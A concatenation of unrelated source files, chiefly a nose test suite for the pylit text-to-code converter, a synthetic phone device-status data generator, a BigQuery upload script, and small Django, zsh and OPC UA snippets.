plot_cross_section(**kwargs) if __name__ == '__main__': main() LawrenceDior/thetis0 #!/usr/bin/env python # -*- coding: iso-8859-1 -*- ## pylit_test.py ## ************* ## Test pylit.py Python Module ## +++++++++++++++++++++++++++ ## ## :Date: $Date: 2007-05-17 $ ## :Version: SVN-Revision $Revision: 45 $ ## :URL: $URL: svn+ssh://svn.berlios.de/svnroot/repos/pylit/trunk/test/pylit_test.py $ ## :Copyright: 2006 . ## Released under the terms of the GNU General Public License ## (v. 2 or later) ## ## .. 
contents:: ## ## A catalogue of errors ## ===================== ## ## from file:///home/milde/Texte/Doc/Programmierung/Software-Carpentry/lec/unit.html ## ## * Numbers: zero, largest, smallest magnitude, most negative ## * Structures: empty, exactly one element, maximum number of elements ## - Duplicate elements (e.g., letter "J" appears three times in a string) ## - Aliased elements (e.g., a list contains two references to another list) ## - Circular structures (e.g., a list that contains a reference to itself) ## * Searching: no match found, one match found, multiple matches found, ## everything matches ## - Code like x = find_all(structure)[0] is almost always wrong ## - Should also check aliased matches (same thing found multiple times) ## :: """pylit_test.py: test the "literal python" module""" from pprint import pprint import operator from pylit import * import nose ## Test DefaultDict ## ================ class test_DefaultDict(object): """Test the DefaultDict dictionary with custom default""" def setUp(self): self.defdict = DefaultDict('#') def test_get_default(self): assert self.defdict['nonexisting'] == '#' def test_set_get(self): self.defdict['mykey'] = 3 assert self.defdict['mykey'] == 3 def test_change_default(self): self.defdict.default = '%' assert self.defdict['nonexisting'] == '%' def test_init_args(self): di = DefaultDict('#', {'mykey': 3}) assert di['mykey'] == 3 assert di['nonexisting'] == '#' def test_init_args2(self): di = DefaultDict('#', mykey = 3) assert di['mykey'] == 3 assert di['nonexisting'] == '#' def test_init_args3(self): di = DefaultDict('#', [('mykey', 3)]) assert di['mykey'] == 3 assert di['nonexisting'] == '#' ## Text <-> Code conversion ## ======================== ## ## Test strings ## ============ ## ## Example of text, code and stripped code with typical features":: text = """.. #!/usr/bin/env python # -*- coding: iso-8859-1 -*- Leading text in several paragraphs followed by a literal block:: block1 = 'first block' Some more text and the next block. :: block2 = 'second block' print block1, block2 Trailing text. """ # print text ## The converter expects the data in separate lines (iterator or list) ## with trailing newlines. We use the `splitlines` string method with ## `keepends=True`:: textdata = text.splitlines(True) # print textdata ## If a "code" source is converted with the `strip` option, only text blocks ## are extracted, which leads to:: stripped_text = """Leading text in several paragraphs followed by a literal block: Some more text and the next block. Trailing text. """ ## The code corresponding to the text test string. ## ## Using a triple-quoted string for the code (and stripped_code) can create ## problems with the conversion of this test by pylit (as the text parts ## would be converted to text). ## A workaround is using a different comment string for the text blocks and ## converting with e.g. ``pylit --comment-string='## ' pylit_test.py``. ## ## :: code = """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- # Leading text # # in several paragraphs followed by a literal block:: block1 = 'first block' # Some more text and the next block. :: block2 = 'second block' print block1, block2 # Trailing text. 
""" # print code codedata = code.splitlines(True) ## Converting the text teststring with the `strip` option leads to:: stripped_code = """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- block1 = 'first block' block2 = 'second block' print block1, block2 """ ## pprint(textdata) ## pprint(stripped_code.splitlines(True)) ## ## Containers for special case examples: ## ## 1. Text2Code samples ## ``textsamples["what"] = (, , , , code""" ## :: def setUp(self): self.converter = Text2Code(textdata) ## test helper funs :: def test_set_state_empty(self): try: self.converter.set_state([]) raise AssertionError, "should raise StopIteration" except StopIteration: pass def test_set_state_header(self): """test for "header" or "documentation" for first block""" self.converter.state = "" # normally set by the `convert` method self.converter.set_state([".. header", " block"]) assert self.converter.state == "header" self.converter.state = "" # normally set by the `convert` method self.converter.set_state(["documentation", "block"]) assert self.converter.state == "documentation" def test_set_state_code_block(self): """test for "header" or "documentation" for "code_block" """ # normally set by the `convert` method self.converter._textindent = 0 self.converter.state = "code_block" self.converter.set_state(["documentation", " block"]) assert self.converter.state == "documentation" self.converter.state = "code_block" self.converter.set_state([" documentation", "block"]) assert self.converter.state == "documentation" self.converter.state = "code_block" self.converter.set_state([" code", " block"]) print self.converter.state assert self.converter.state == "code_block" def test_header_handler(self): """should strip header-string from header""" self.converter._codeindent = 0 sample = [".. header", " block"] lines = [line for line in self.converter.header_handler(sample)] print lines assert lines == ["header", "block"] def test_documentation_handler(self): """should add comment string to documentation""" sample = ["doc", "block", ""] lines = [line for line in self.converter.documentation_handler(sample)] print lines assert lines == ["# doc", "# block", "# "] def test_documentation_handler_set_state(self): """should add comment string to documentation""" sample = ["doc", "block::", ""] lines = [line for line in self.converter.documentation_handler(sample)] print lines assert lines == ["# doc", "# block::", ""] assert self.converter.state == "code_block" def test_code_block_handler(self): """should un-indent code-blocks""" self.converter._codeindent = 0 # normally set in `convert` sample = [" code", " block", ""] lines = [line for line in self.converter.code_block_handler(sample)] print lines assert lines == ["code", "block", ""] ## base tests on the "long" test data :: def test_call(self): """Calling a Text2Code instance should return the converted data as list of lines""" output = self.converter() print repr(codedata) print repr(output) assert codedata == output def test_call_strip(self): """strip=True should strip text parts""" self.converter.strip = True output = self.converter() print repr(stripped_code.splitlines(True)) print repr(output) assert stripped_code.splitlines(True) == output def test_str(self): outstr = str(self.converter) print repr(code) print repr(outstr) assert code == outstr def test_str_strip1(self): """strip=True should strip text parts. 
Version 1 with `strip` given as optional argument""" outstr = str(Text2Code(textdata, strip=True)) print "ist ", repr(outstr) print "soll", repr(stripped_code) # pprint(outstr) assert stripped_code == outstr def test_str_strip2(self): """strip=True should strip text parts Version 2 with `strip` set after instantiation""" self.converter.strip = True outstr = str(self.converter) print "ist ", repr(outstr) print "soll", repr(stripped_code) # pprint(outstr) assert stripped_code == outstr def test_malindented_code_line(self): """raise error if code line is less indented than code-indent""" data1 = [".. #!/usr/bin/env python\n", # indent == 4 * " " "\n", " print 'hello world'"] # indent == 2 * " " data2 = ["..\t#!/usr/bin/env python\n", # indent == 8 * " " "\n", " print 'hello world'"] # indent == 2 * " " for data in (data1, data2): try: blocks = Text2Code(data)() assert False, "wrong indent did not raise ValueError" except ValueError: pass def test_str_different_comment_string(self): """Convert only comments with the specified comment string to text """ data = [".. #!/usr/bin/env python\n", '\n', '::\n', # leading code block as header '\n', " block1 = 'first block'\n", '\n', 'more text'] soll = "\n".join(["#!/usr/bin/env python", "", "##::", "", "block1 = 'first block'", "", "##more text"] ) outstr = str(Text2Code(data, comment_string="##")) print "soll:", repr(soll) print "ist: ", repr(outstr) assert outstr == soll # Filters: test pre- and postprocessing of data def test_get_filter_preprocessor(self): """should return filter from filter_set for language""" preprocessor = self.converter.get_filter("preprocessors", "rl") print preprocessor assert preprocessor == l2r_filter def test_get_filter_postprocessor(self): """should return filter from filter_set for language""" postprocessor = self.converter.get_filter("postprocessors", "x") print postprocessor assert postprocessor == u2x_filter def test_get_css_postprocessor(self): """should return filter from filter_set for language""" postprocessor = self.converter.get_filter("postprocessors", "css") print postprocessor assert postprocessor == dumb_c_postprocessor def test_get_filter_nonexisting_language_filter(self): """should return identity_filter if language has no filter in set""" preprocessor = self.converter.get_filter("preprocessors", "foo") print preprocessor assert preprocessor == identity_filter def test_get_filter_nonexisting_filter_set(self): """should return identity_filter if filter_set does not exist""" processor = self.converter.get_filter("foo_filters", "foo") print processor assert processor == identity_filter def test_preprocessor(self): """Preprocess data with registered preprocessor for language""" output = Text2Code(textdata, language="x", comment_string="# ")() soll = [line for line in u2x_filter(codedata)] print "soll: ", repr(soll) print "ist: ", repr(output) assert output == soll def test_postprocessor(self): """Preprocess data with registered postprocessor for language""" output = Text2Code(textdata, language="x", comment_string="# ")() soll = [line for line in u2x_filter(codedata)] print "soll:", repr(soll) print "ist: ", repr(output) assert output == soll ## Special Cases ## ------------- ## ## Code follows text block without blank line ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## End of text block detected ('::') but no paragraph separator (blank line) ## follows ## ## It is an reStructuredText syntax error, if a "literal block ## marker" is not followed by a blank line. 
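## (Docutils reports this case with a system message along the lines of
## "Literal block expected; none found.")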
## ## Assuming that no double colon at end of line occurs accidentally, ## pylit could fix this and issue a warning:: # Do we need this feature? (Complicates code a lot) # textsamples["ensure blank line after text"] = ( # """text followed by a literal block:: # block1 = 'first block' # """, # """# text followed by a literal block:: # # block1 = 'first block' # """) ## Text follows code block without blank line ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## End of code block detected (a line not more indented than the preceding text ## block) ## ## reStructuredText syntax demands a paragraph separator (blank line) before ## it. ## ## Assuming that the unindent is not accidental, pylit could fix this and ## issues a warning:: # Do we need this feature? (Complicates code) # textsamples["ensure blank line after code"] = ( # """:: # # block1 = 'first block' # more text # """, # """# :: # # block1 = 'first block' # # more text # """) ## Options follow code-block directive ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ textsamples["code-block directive options"] = ( """\ :: :option: argument this = 'code' """, """\ # :: # :option: argument this = 'code' """) textsamples["no code-block directive options"] = ( """\ :: text following ``::`` without blank line more documentation """, """\ # :: # text following ``::`` without blank line # # more documentation """) ## A double colon on a line on its own ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## As a double colon is added by the Code2Text conversion after a text block ## (if not already present), it could be removed by the Text2Code conversion ## to keep the source small and pretty. ## ## However, this would put the text and code source line numbers out of sync, ## which is bad for error reporting, failing doctests, and the JED editor ## support with the `pylit_buffer()` function in ## http://jedmodes.sf.net/mode/pylit.sl . ## ## Maybe this could be left to a post-processing filter:: # textsamples["remove single double colon"] = ( # ["text followed by a literal block\n", # "\n", # "::\n", # "\n", # " foo = 'first'\n"] # ["", # empty header # "# text followed by a literal block\n\n", # "foo = 'first'\n"] ## header samples ## ~~~~~~~~~~~~~~ ## Convert a leading reStructured text comment (variant: only if there is ## content on the first line) to a leading code block. Return an empty list, ## if there is no header. :: textsamples["simple header"] = (".. print 'hello world'", "print 'hello world'") textsamples["no header (start with text)"] = ( """a classical example without header:: print 'hello world' """, """# a classical example without header:: print 'hello world' """) textsamples["no header (start with blank line)"] = ( """ a classical example without header:: print 'hello world' """, """# # a classical example without header:: print 'hello world' """) textsamples["standard header, followed by text"] = ( """.. #!/usr/bin/env python # -*- coding: iso-8859-1 -*- a classical example with header:: print 'hello world' """, """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- # a classical example with header:: print 'hello world' """) textsamples["standard header, followed by code"] = ( """.. 
#!/usr/bin/env python print 'hello world' """, """#!/usr/bin/env python print 'hello world' """) textsamples["null string"] = ("", "", "") ## Code2Text ## ========= ## ## :: class test_Code2Text(object): def setUp(self): self.converter = Code2Text(codedata) ## Code2Text.strip_literal_marker ## ## * strip `::`-line as well as preceding blank line if on a line on its own ## * strip `::` if it is preceded by whitespace. ## * convert `::` to a single colon if preceded by text ## ## :: def check_strip_code_block_marker(self, sample): """test Code2Text.strip_code_block_marker""" ist = sample[0].splitlines(True) soll = sample[1].splitlines(True) print "before", ist converter = Code2Text(codedata) converter.strip_code_block_marker(ist) print "soll:", repr(soll) print "ist: ", repr(ist) assert ist == soll def test_strip_code_block_marker(self): samples = (("text\n\n::\n\n", "text\n\n"), ("text\n::\n\n", "text\n\n"), ("text ::\n\n", "text\n\n"), ("text::\n\n", "text:\n\n"), ("text:\n\n", "text:\n\n"), ("text\n\n", "text\n\n"), ("text\n", "text\n") ) for sample in samples: yield (self.check_strip_code_block_marker, sample) ## Code2Text.set_state ## :: def test_set_state(self): samples = (("code_block", ["code_block\n"], "code_block"), ("code_block", ["#code_block\n"], "code_block"), ("code_block", ["## code_block\n"], "code_block"), ("code_block", ["# documentation\n"], "documentation"), ("code_block", ["# documentation\n"], "documentation"), ("code_block", ["# \n"], "documentation"), ("code_block", ["#\n"], "documentation"), ("code_block", ["\n"], "documentation"), ("", ["code_block\n"], "header"), ("", ["# documentation\n"], "documentation"), ("documentation", ["code_block\n"], "code_block"), ("documentation", ["# documentation\n"], "documentation"), ) print "comment string", repr(self.converter.comment_string) for (old_state, lines, soll) in samples: self.converter.state = old_state self.converter.set_state(lines) print repr(lines), "old state", old_state print "soll", repr(soll), print "result", repr(self.converter.state) assert soll == self.converter.state ## base tests on the "long" test strings :: def test_call(self): output = self.converter() print repr(textdata) print repr(output) assert textdata == output def test_call_strip(self): output = Code2Text(codedata, strip=True)() print repr(stripped_text.splitlines(True)) print repr(output) assert stripped_text.splitlines(True) == output def test_str(self): """Test Code2Text class converting code->text""" outstr = str(self.converter) # print text print "soll:", repr(text) print "ist: ", repr(outstr) assert text == outstr def test_str_strip(self): """Test Code2Text class converting code->rst with strip=True Should strip code blocks """ outstr = str(Code2Text(codedata, strip=True)) print repr(stripped_text) print repr(outstr) assert stripped_text == outstr def test_str_different_comment_string(self): """Convert only comments with the specified comment string to text """ outstr = str(Code2Text(codedata, comment_string="##", strip=True)) print outstr assert outstr == "" data = ["# ::\n", "\n", "block1 = 'first block'\n", "\n", "## more text"] soll = "\n".join(['.. # ::', # leading code block as header ' ', " block1 = 'first block'", ' ', ' more text'] # keep space (not part of comment string) ) outstr = str(Code2Text(data, comment_string="##")) print "soll:", repr(soll) print "ist: ", repr(outstr) assert outstr == soll def test_call_different_code_block_marker(self): """recognize specified code-block marker """ data = ["# .. 
code-block:: python\n", "\n", "block1 = 'first block'\n", "\n", "# more text\n"] soll = ['.. code-block:: python\n', '\n', " block1 = 'first block'\n", ' \n', ' more text\n'] # keep space (not part of comment string) converter = Code2Text(data, code_block_marker='.. code-block::') output = converter() print "soll:", repr(soll) print "ist: ", repr(output) assert output == soll # Filters: test pre- and postprocessing of Code2Text data conversion def test_get_filter_preprocessor(self): """should return Code2Text preprocessor for language""" preprocessor = self.converter.get_filter("preprocessors", "rl") print preprocessor assert preprocessor == r2l_filter def test_get_css_preprocessor(self): """should return filter from filter_set for language""" preprocessor = self.converter.get_filter("preprocessors", "css") print preprocessor assert preprocessor == dumb_c_preprocessor def test_get_filter_postprocessor(self): """should return Code2Text postprocessor for language""" postprocessor = self.converter.get_filter("postprocessors", "x") print postprocessor assert postprocessor == x2u_filter def test_get_filter_nonexisting_language_filter(self): """should return identity_filter if language has no filter in set""" preprocessor = self.converter.get_filter("preprocessors", "foo") print preprocessor assert preprocessor == identity_filter def test_get_filter_nonexisting_filter_set(self): """should return identity_filter if filter_set does not exist""" processor = self.converter.get_filter("foo_filters", "foo") print processor assert processor == identity_filter def test_preprocessor(self): """Preprocess data with registered preprocessor for language""" converter = Code2Text(codedata, language="rl", comment_string="# ") print "preprocessor", converter.preprocessor print "postprocessor", converter.postprocessor output = converter() soll = [line.replace("r", "l") for line in textdata] print "ist: ", repr(output) print "soll:", repr(soll) assert output == soll def test_postprocessor(self): """Postprocess data with registered postprocessor for language""" output = Code2Text(codedata, language="x", comment_string="# ")() soll = [line.replace("x", "u") for line in textdata] print "soll:", repr(soll) print "ist: ", repr(output) assert output == soll ## Special cases ## ------------- ## ## blank comment line ## ~~~~~~~~~~~~~~~~~~ ## ## Normally, whitespace in the comment string is significant, i.e. with ## ``comment_string = "# "``, a line ``"#something\n"`` will count as code. ## ## However, if a comment line is blank, trailing whitespace in the comment ## string should be ignored, i.e. ``#\n`` is recognised as a blank text line:: codesamples["ignore trailing whitespace in comment string for blank line"] = ( """# :: block1 = 'first block' # # more text """, """:: block1 = 'first block' more text """) ## No blank line after text ## ~~~~~~~~~~~~~~~~~~~~~~~~ ## ## If a matching comment precedes or follows a code line (i.e. any line ## without matching comment) without a blank line in between, it counts as code ## line. ## ## This will keep small inline comments close to the code they comment on. 
It ## will also keep blocks together where one commented line does not match the ## comment string (the whole block will be kept as commented code) ## :: codesamples["comment before code (without blank line)"] = ( """\ # this is text:: # this is a comment foo = 'first' """, """\ this is text:: # this is a comment foo = 'first' """, """\ this is text: """) codesamples["comment block before code (without blank line)"] = ( """\ # no text (watch the comment sign in the next line):: # # this is a comment foo = 'first' """, """\ .. # no text (watch the comment sign in the next line):: # # this is a comment foo = 'first' """, "") codesamples["comment after code (without blank line)"] = ( """\ # :: block1 = 'first block' # commented code # text again """, """\ :: block1 = 'first block' # commented code text again """, """ text again """) codesamples["comment block after code (without blank line)"] = ( """\ # :: block1 = 'first block' # commented code # # still comment """, """:: block1 = 'first block' # commented code # # still comment """, """ """) ## missing literal block marker ## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ## ## If text (with matching comment string) is followed by code (line(s) without ## matching comment string), but there is no double colon at the end, back ## conversion would not recognise the end of text! ## ## Therefore, pylit adds a paragraph containing only ``::`` -- the literal ## block marker in expanded form. (While it would in many cases be nicer to ## add the double colon to the last text line, this is not always valid rst ## syntax, e.g. after a section header or a list. Therefore the automatic ## insertion will use the save form, feel free to correct this by hand.):: codesamples["insert missing double colon after text block"] = ( """# text followed by code without double colon foo = 'first' """, """text followed by code without double colon :: foo = 'first' """, """text followed by code without double colon """) codesamples["ignore directive options when looking for code-block marker"] = ( """\ # :: # :option: argument # :option2: argument this = 'code' """, """\ :: :option: argument :option2: argument this = 'code' """) codesamples["code-block marker followed by text not a directive option"] = ( """\ # :: # text following ``::`` without blank line this = 'code' """, """\ :: text following ``::`` without blank line :: this = 'code' """) ## header samples ## ~~~~~~~~~~~~~~ ## ## Convert a header (leading code block) to a reStructured text comment. :: codesamples["no matching comment, just code"] = ( """print 'hello world' print 'ende' """, """.. print 'hello world' print 'ende' """) codesamples["empty header (start with matching comment)"] = ( """# a classical example without header:: print 'hello world' """, """a classical example without header:: print 'hello world' """, """a classical example without header: """) codesamples["standard header, followed by text"] = ( """#!/usr/bin/env python # -*- coding: iso-8859-1 -*- # a classical example with header:: print 'hello world' """, """.. #!/usr/bin/env python # -*- coding: iso-8859-1 -*- a classical example with header:: print 'hello world' """, """a classical example with header: """) codesamples["standard header, followed by code"] = ( """#!/usr/bin/env python print 'hello world' """, """.. 
#!/usr/bin/env python print 'hello world' """, "") ## Filter tests ## ============ ## ## :: css_code = ['/* import the default Docutils style sheet */\n', '/* --------------------------------------- */\n', '\n', '/* :: */\n', '\n', '/*comment*/\n', '@import url("html4css1.css"); /* style */\n'] ## :: css_filtered_code = ['// import the default Docutils style sheet\n', '// ---------------------------------------\n', '\n', '// ::\n', '\n', '/*comment*/\n', '@import url("html4css1.css"); /* style */\n'] ## :: def test_dumb_c_preprocessor(): """convert `C` to `C++` comments""" output = [line for line in dumb_c_preprocessor(css_code)] print "ist: %r"%output print "soll: %r"%css_filtered_code assert output == css_filtered_code ## :: def test_dumb_c_postprocessor(): """convert `C++` to `C` comments""" output = [line for line in dumb_c_postprocessor(css_filtered_code)] print "ist: %r"%output print "soll: %r"%css_code assert output == css_code ## :: if __name__ == "__main__": nose.runmodule() # requires nose 0.9.1 sys.exit() devsh/data/writedevicestatus-devsh.py0 #!/usr/bin/python # Originally based on https://github.infra.cloudera.com/EDU/bda-vm/blob/master/maintenance/datacreation/writedevicestatus.py import peewee from peewee import * import datetime import os import random #from common import * from dateutil.relativedelta import relativedelta import sys if len(sys.argv) != 2: quit('Specify the base output directory with a trailing slash') outputdirectory = sys.argv[1] if not os.path.exists(outputdirectory): os.mkdir(outputdirectory) startingDate = datetime.datetime(2018, 3, 15, 10, 10, 20) devicePatterns = { 'Sorrento' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'iFruit' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'Ronin' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'MeeToo' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', 'Titanic' : '{time},{name},{deviceid},{devicetemp},{ambienttemp},{batterypercent},{gpsstatus},{bluetoothstatus},{wifistatus},{signalpercent},{cpuload},{ramusage},{latitude},{longitude}\n', } def createRowString(currentTimeString, pattern, name, deviceid, zipcode): ambienttemp = random.randrange(10,35) if name == "Sorrento F41L": # battery_level: % typical range: 20.0 - 80.0; values for Sorrento F41L phone should drop more quickly and be much lower on average) batterypercent = str(random.randrange(20, 75)) # cpu_usage: % (typical range: 10% - 70%); F41L phone should be ~ 20% higher than for any other model. cpuload = str(random.randrange(40,100)) # device_temp: celsius (typical range: ambient_temp times ~ 1.07; Sorrento F41L phone should be ambient_temp times ~ 1.4) devicetemp = int(float(ambienttemp) * random.uniform(1.2, 1.4)) else: batterypercent = str(random.randrange(20, 100)) # cpu_usage: % (typical range: 10% - 70%); F41L phone should be ~ 20% higher than for any other model. 
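# Non-F41L devices: CPU load stays in the typical 0-70% band noted above, and the
# device temperature runs only slightly above ambient (factor ~1.0-1.07).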
cpuload = str(random.randrange(0,70)) # device_temp: celsius (typical range: ambient_temp times ~ 1.07; Sorrento F41L phone should be ambient_temp times ~ 1.4) devicetemp = int(float(ambienttemp) * random.uniform(1.0, 1.07)) signalpercent = str(random.randrange(30,100)) ramusage = str(random.randrange(0,70)) # Make the device temp a delta devicetemp = devicetemp - ambienttemp # WiFi status: one of [disabled / enabled / connected]; should always be disabled for 10% of devices, and for the other 90% of devices, should be disabled 1% of the time. # If not disabled, there should be a 40% chance that the state is connected at any given moment. if random.randrange(0,9) == 0: wifistatus = "disabled" else: randomChoice = random.randrange(0, 99) if randomChoice < 1: wifistatus = "disabled" elif randomChoice < 40: wifistatus = "connected" else: wifistatus = "enabled" # Bluetooth status: one of [disabled / enabled / connected]. Should always be disabled for 20% of devices, and for the other 80% of devices, should be disabled 1% of the time. # If not disabled, there should be a 25% chance that the state is connected at any given moment. if random.randrange(0,9) < 2: bluetoothstatus = "disabled" else: randomChoice = random.randrange(0, 99) if randomChoice < 1: bluetoothstatus = "disabled" elif randomChoice < 25: bluetoothstatus = "connected" else: bluetoothstatus = "enabled" # GPS status: one of [disabled / enabled ]; should always be disabled for 5% of devices, and for the other 95% of devices, should be disabled 1% of the time. if random.randrange(0,99) < 5: gpsstatus = "disabled" else: randomChoice = random.randrange(0, 99) if randomChoice < 1: gpsstatus = "disabled" else: gpsstatus = "enabled" latitude = 0 longitude = 0 # Randomize the GPS location based on the account's zip code if gpsstatus == "enabled": zipbase = zipcode[:3] zipbaseAsInt = int(zipbase) if zipbase in zipCodeToLatLong: latitude, longitude = zipCodeToLatLong[zipbase] # Try one zipcode higher elif str(zipbaseAsInt + 1) in zipCodeToLatLong: latitude, longitude = zipCodeToLatLong[str(zipbaseAsInt + 1)] # Try one zipcode lower elif str(zipbaseAsInt - 1) in zipCodeToLatLong: latitude, longitude = zipCodeToLatLong[str(zipbaseAsInt - 1)] else: print "Couldn't find zipcode for " + zipbase latitude = float(latitude) + random.uniform(0.0, 0.5) longitude = float(longitude) + random.uniform(0.0, 0.5) return pattern.format(time=currentTimeString,name=name,ambienttemp=ambienttemp,batterypercent=batterypercent,signalpercent=signalpercent,cpuload=cpuload,deviceid=deviceid,devicetemp=devicetemp, ramusage=ramusage,latitude=latitude,longitude=longitude,wifistatus=wifistatus,bluetoothstatus=bluetoothstatus,gpsstatus=gpsstatus) numberOfDevices = 0 numberOfRows = 0 def createRows(accountDevices): global startingDate, numberOfDevices, numberOfRows i = 0 currentTimeString = startingDate.strftime('%Y-%m-%d:%H:%M:%S') for accountDevice in accountDevices: devicePattern = None deviceManufacturer = accountDevice.device.device_name.partition(' ')[0] devicePattern = devicePatterns[deviceManufacturer] if devicePattern is None: print "Device pattern not found for " + accountDevice.device.device_name row = createRowString(currentTimeString, devicePattern, accountDevice.device.device_name, accountDevice.account_device_id, accountDevice.account.zipcode) devicestatusfile.write(row) i += 1 if i % UPDATES_PER_SECOND == 0: startingDate = startingDate + datetime.timedelta(seconds=1) currentTimeString = startingDate.strftime('%Y-%m-%d:%H:%M:%S') numberOfDevices += 1 
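# numberOfDevices and numberOfRows are the module-level counters declared global at
# the top of createRows; numberOfRows also drives the progress message printed every
# 100000 rows below.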
numberOfRows += 1 if numberOfRows % 100000 == 0: print "Output " + str(numberOfRows) + " rows so far for time " + startingDate.strftime('%Y-%m-%d:%H:%M:%S') zipCodeToLatLong = {} def readBaseStations(): #BaseStation.drop_table(fail_silently=True) #BaseStation.create_table() devicestatusfile = open(outputdirectory + "base_stations.tsv", "r") for line in devicestatusfile: station_num, zipcode, city, state, latitude, longitude = line.strip().split('\t') zipcodeBase = zipcode[:3] zipCodeToLatLong.update({zipcodeBase : [latitude, longitude]}) station_num = int(station_num) latitude = float(latitude) longitude = float(longitude) baseStation = BaseStation(station_num=station_num,zipcode=zipcode,city=city,state=state,latitude=latitude,longitude=longitude) baseStation.save(force_insert=True) devicestatusfile.close() #MostActiveStation.drop_table(fail_silently=True) #MostActiveStation.create_table() print "Writing out base stations" readBaseStations() print "Writing out device status" devicestatusfile = open(outputdirectory + "devicestatus.txt", "w") accountDevices = AccountDevice.select().join(Account).where( (Account.acct_close_dt >> None) & ((fn.Mod(Account.acct_num, 100) == 99) | (fn.Mod(Account.acct_num, 100) == 98) | (Account.acct_num == demoAccount)) ).order_by(fn.Rand()) for x in range(0, (60 * 3)): numberOfDevices = 0 createRows(accountDevices) devicestatusfile.close() print "Created " + str(numberOfRows) + " for " + str(numberOfDevices) + " devices"python/dump/load-data-by-POST.py import sys import json from apiclient.discovery import build from oauth2client.file import Storage from oauth2client.client import OAuth2WebServerFlow from oauth2client.tools import run import httplib2 # for python3 compat raw_input = vars(__builtins__).get('raw_input', input) FLOW = OAuth2WebServerFlow( client_id='xxxxxxx.apps.googleusercontent.com', client_secret='', scope='https://www.googleapis.com/auth/bigquery', user_agent='my-program-name/1.0') def loadTable(http, service): projectId = raw_input('Choose your project ID: ') datasetId = raw_input('Choose a dataset ID: ') tableId = raw_input('Choose a table name to load the data to: ') url = ('https://www.googleapis.com/upload/bigquery/v2/projects/' + projectId + '/jobs') newSchemaFile = raw_input('What is your schema? ') schema = open(newSchemaFile, 'r') # Create the body of the request, separated by a boundary of xxx newresource = ('--xxx\n' + 'Content-Type: application/json; charset=UTF-8\n' + '\n' + '{\n' + ' "configuration": {\n' + ' "load": {\n' + ' "schema": {\n' ' "fields": ' + schema.read() + '\n' + ' },\n' + ' "destinationTable": {\n' + ' "projectId": "' + projectId + '",\n' + ' "datasetId": "' + datasetId + '",\n' + ' "tableId": "' + tableId + '"\n' + ' }\n' + ' }\n' + ' }\n' + '}\n' + '--xxx\n' + 'Content-Type: application/octet-stream\n' + '\n') newDataFile = raw_input('What is your data? 
') # Append data from the specified file to the request body f = open(newDataFile, 'r') newresource += f.read() # Signify the end of the body newresource += ('--xxx--\n') headers = {'Content-Type': 'multipart/related; boundary=xxx'} resp, content = http.request(url, method='POST', body=newresource, headers=headers) if resp.status == 200: jsonResponse = json.loads(content) jobReference = jsonResponse['jobReference']['jobId'] import time while True: jobCollection = service.jobs() getJob = jobCollection.get(projectId=projectId, jobId=jobReference).execute() currentStatus = getJob['status']['state'] if 'DONE' == currentStatus: print('Done Loading!') return else: print('Waiting to load...') print('Current status: ' + currentStatus) print(time.ctime()) time.sleep(10) def main(argv): # If the credentials don't exist or are invalid, run the native client # auth flow. The Storage object will ensure that if successful the good # credentials will get written back to a file. # # Choose a file name to store the credentials. storage = Storage('bigquery2.dat') credentials = storage.get() if credentials is None or credentials.invalid: credentials = run(FLOW, storage) # Create an httplib2.Http object to handle our HTTP requests # and authorize it with our good credentials. http = httplib2.Http() http = credentials.authorize(http) service = build('bigquery', 'v2', http=http) loadTable(http, service) if __name__ == '__main__': main(sys.argv) .config/zsh/site-functions/_make_parameters.py #compdef make_parameters.py _values "Defined parameter sets" $(grep -A1 "^@parameterset" make_parameters.py | sed -n 's/def \(.\+\)():/\1/p') kemalayhan/kinda-stackoverflow from django.contrib import admin from django.urls import path, include from django.views.generic import TemplateView from django.conf import settings from django.conf.urls.static import static from django.contrib.auth import views as auth_views urlpatterns = [ path('admin/', admin.site.urls), path( '', TemplateView.as_view(template_name="homepage.html"), name="homepage" ), path('users/', include('users.urls')), path('questions/', include('questions.urls')), path('tags/', include('tags.urls')), path('login/', auth_views.LoginView.as_view(), name="login"), path('logout/', auth_views.LogoutView.as_view(), name="logout"), ] if settings.DEBUG: urlpatterns += static( settings.MEDIA_URL, document_root=settings.MEDIA_ROOT ) bryankim96/psct-gui """Module for OPC UA device mirroring classes.""" from abc import abstractmethod import logging import threading import random import time from psct_gui_backend.device_models import BaseDeviceModel logger = logging.getLogger(__name__) class DummyDeviceModel(BaseDeviceModel): DEVICE_TYPE_NAME = "DummyDeviceModel" @abstractmethod def __init__(self, socketio_server=None): """Instantiate a DummyDeviceModel instance.""" super().__init__(socketio_server=socketio_server) self._id = "" self._name = "" self._type = self.DEVICE_TYPE_NAME self._position_info = {} self._data = {} self._errors = {} self._methods = [] @classmethod def create(cls, obj_node, opcua_client, *args, **kwargs): """Model class for OPC UA device models. Mirrors OPC UA objects (panels, MPES, etc.) as Python objects. Parameters ---------- obj_node : opcua.Node OPC UA node of the device to be mirrored. opcua_client : opcua.Client OPC UA Client instance connected to the alignment server. socketio_server : socketio.Server Socket.io Server instance used to connect to client browsers. 
